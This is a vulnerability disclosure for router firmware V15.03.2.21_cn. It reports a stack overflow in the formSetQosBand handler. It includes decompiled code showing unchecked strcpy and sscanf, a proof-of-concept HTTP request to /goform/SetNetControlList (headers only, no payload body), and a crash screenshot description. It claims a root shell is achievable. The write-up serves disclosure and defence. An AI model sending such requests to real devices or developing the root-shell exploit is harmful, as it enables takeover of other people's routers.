

Vulnerability details

Formsetqosband function dest copies the matched content to the stack through regular expression without judging the size, resulting in stack overflow vulnerability. In fact, the parameters of NPTR, V12, V10 and V11 are controllable, and there are stack overflow vulnerabilities

```
v16 = strchr(src, a3);
if ( !v16 )
    break;

*v16++ = 0;
memset(dest, 0, 0x100u);
strcpy(dest, src);
if ( dest[0] == ';' )
{
    sscanf(dest, ";%[^;];%[^;];%[^;];", nptr, v12, v10, v11);
}
else
{
    sscanf(dest, "%[^;];%[^;];%[^;];%[^;];", v9, nptr, v12, v10, v11);
    sub_74D68(v9, v12);
}
v4 = atoi(nptr);
sub_74CBC(v4, v12, v10, v11);
```

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

- 1. Use the fat simulation firmware V15.03.2.21_cn
- 2. Attack with the following POC attacks

```
POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101
Firefox/96.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1068
Origin: http://192.168.11.1
Connection: close
Referer: http://192.168.11.1/net_control.html?random=0.0870818490459091&
Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcjbz1qw
```



The reproduction results are as follows:

Unable to connect

An error occurred during a connection to 192.168.0.1.

- . The site could be temporarily unavailable or too busy. Try again in a few moments.
- · If you are unable to load any pages, check your computer's network connection.
- If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access
 the Web.

Try Again

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

